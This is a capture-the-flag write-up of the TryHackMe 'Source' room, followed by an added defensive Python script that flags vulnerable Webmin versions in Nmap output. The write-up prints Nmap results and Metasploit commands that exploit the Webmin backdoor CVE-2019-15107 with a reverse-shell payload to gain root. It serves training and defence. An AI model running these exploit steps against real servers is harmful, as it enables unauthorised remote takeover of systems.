Source

https://tryhackme.com/room/source

First I ran an Nmap scan, from which we see that ports 22 and 10000 are open. We also see that port 10000 runs some web service called Webmin.

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b74cd0bde27b1b15722764562915ea23 (RSA)
|   256 b78523114f44fa22008e40775ecf287c (ECDSA)
|_  256 a9fe4b82bf893459365becdac2d395ce (ED25519)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 7B403D3D5C87B168EA5B8ADA089E342C
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

After looking through the webpage, which requires SSL (https), I searched for known vulnerabilities in Webmin and found CVE-2019-15107. Metasploit has an exploit for this one, which makes things very easy. I configured it as such and got immediate root access.

I don't think that was the intended way of doing things, but it worked very well.

msf6 > use exploit/linux/http/webmin_backdoor
[*] Using configured payload cmd/unix/reverse_perl

msf6 exploit(linux/http/webmin_backdoor) > set rhost 10.10.186.27
rhost => 10.10.186.27

msf6 exploit(linux/http/webmin_backdoor) > set lhost tun0
lhost => NOTSHOWN

msf6 exploit(linux/http/webmin_backdoor) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true

msf6 exploit(linux/http/webmin_backdoor) > run
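
From the defender's side, the same Nmap banner is enough to triage hosts for CVE-2019-15107. The following is an added example, not part of the original write-up: the function names are hypothetical, and the affected version ranges are taken from the Webmin vendor advisory, not from this page.

```python
import re

# Constructed sample: the two service lines from the Nmap output in this write-up.
SAMPLE_SCAN = """\
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
"""

# Assumption, from the Webmin vendor advisory rather than this page:
# 1.890 is exposed in its default configuration, 1.900-1.920 only when the
# "change expired passwords" option is enabled, and 1.930 removes the code.
DEFAULT_EXPOSED = (1, 890)
CONDITIONAL_RANGE = ((1, 900), (1, 920))

# Matches an open TCP service line whose banner is Webmin's MiniServ httpd.
MINISERV_LINE = re.compile(
    r"^(?P<port>\d+)/tcp\s+open\s+\S+\s+MiniServ (?P<ver>\d+\.\d+)\b.*Webmin",
    re.MULTILINE,
)


def classify(version: str) -> str:
    """Map a MiniServ version string to a CVE-2019-15107 triage verdict."""
    major, minor = version.split(".")
    # Pad the minor part so "1.9" and "1.900" compare as the same release.
    key = (int(major), int(minor.ljust(3, "0")))
    if key == DEFAULT_EXPOSED:
        return "affected-default-config"
    if CONDITIONAL_RANGE[0] <= key <= CONDITIONAL_RANGE[1]:
        return "affected-if-expired-password-change-enabled"
    return "not-in-affected-range"


def triage(scan_text: str) -> list[tuple[int, str, str]]:
    """Return (port, version, verdict) for every Webmin service in the scan."""
    return [
        (int(m["port"]), m["ver"], classify(m["ver"]))
        for m in MINISERV_LINE.finditer(scan_text)
    ]


if __name__ == "__main__":
    for port, version, verdict in triage(SAMPLE_SCAN):
        print(f"port {port}: Webmin {version} -> {verdict}")
```

A host flagged by this check should be upgraded to 1.930 or later; the banner alone does not show whether the expired-password option is enabled on 1.900 to 1.920.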
